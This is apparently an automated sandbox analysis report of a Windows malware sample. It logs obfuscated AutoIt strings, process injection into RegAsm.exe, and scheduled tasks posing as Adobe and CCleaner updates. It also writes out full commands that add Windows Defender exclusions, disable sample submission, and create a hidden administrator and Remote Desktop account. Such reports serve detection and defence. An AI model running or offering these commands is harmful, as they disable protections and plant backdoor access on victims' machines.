Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Local $cYgndbEVcfcQHE = 'xziTKFkvRIloSCqemUsVVdxoIrLNJvzUmkZDnlsIpCvQugL'
Source: Uno.exe.com, 0000000A.00000003.1729458959.0000000003E9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RNbbzuLAPDlgemDREVoKGXekilxmQwymkpeLHgFSdmhU^_
Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: For $lGZwBmlBqZFnnqBqNhHOkgrLoeRIQEMUSBbFCFoVtturCEEKxP = 5 To 34
Source: Rifiutare.exe.com, 00000007.00000003.1731289967.0000000004441000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2137667428.0000000004471000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ONFUMGMXQEMUHQJZU
Source: Rifiutare.exe.com, 00000009.00000003.2137667428.0000000004471000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ONFUMGMXQEMUHQJZU[8\
Source: Uno.exe.com, 0000000A.00000003.1728146711.0000000001561000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Local $LqVmcIxMPtqsLO = Execute(urjDlX("72<118<109<122<105<75<105<120<87<105<118<109<101<112<44<43<70<118<85<88<93<107<80<107<77<88<86<43<45",4)), $qRuxVfhfy = 'QmLxpjFqHbVBYoDeaDWCxqNR'

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00CAF2E8 BlockInput,

7_2_00CAF2E8

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C3331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

7_2_00C3331E

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Code function: 0_2_00407F31 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,

0_2_00407F31

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C55108 mov eax, dword ptr fs:[00000030h]	7_2_00C55108
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A25108 mov eax, dword ptr fs:[00000030h]	10_2_00A25108
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C5108 mov eax, dword ptr fs:[00000030h]	13_2_005C5108

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C920EE WaitForSingleObject,UnloadUserProfile,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,

7_2_00C920EE

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C629B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00C629B2
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C50C5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00C50C5F
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C50DF5 SetUnhandledExceptionFilter,	7_2_00C50DF5
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C51041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00C51041
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A329B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00A329B2
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A20C5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00A20C5F
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A20DF5 SetUnhandledExceptionFilter,	10_2_00A20DF5
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A21041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00A21041
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005D29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_005D29B2
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C0C5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_005C0C5F
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C0DF5 SetUnhandledExceptionFilter,	13_2_005C0DF5
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_005C1041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_005C1041

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 185.199.111.133 443

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Memory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: 580000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Memory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: D00000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Memory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: B90000 value starts with: 4D5A	Jump to behavior

Modifies Windows Defender protection settings

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Memory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: 580000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Memory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: 61A000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Memory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: D00000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Memory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: A8C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Memory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: B90000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Memory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: 9D5000	Jump to behavior

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

7_2_00C91A7B

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C3331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

7_2_00C3331E

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C9BA4A SendInput,keybd_event,

7_2_00C9BA4A

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00C9EB90 mouse_event,

7_2_00C9EB90

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Process created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\System32\makecab.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com Rifiutare.exe.com D	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com Uno.exe.com f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com Inebriato.exe.com R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user fsUIwEqMAc zyTFxcsIkA /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup Administrators fsUIwEqMAc /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" fsUIwEqMAc /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net accounts /maxpwage:unlimited
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
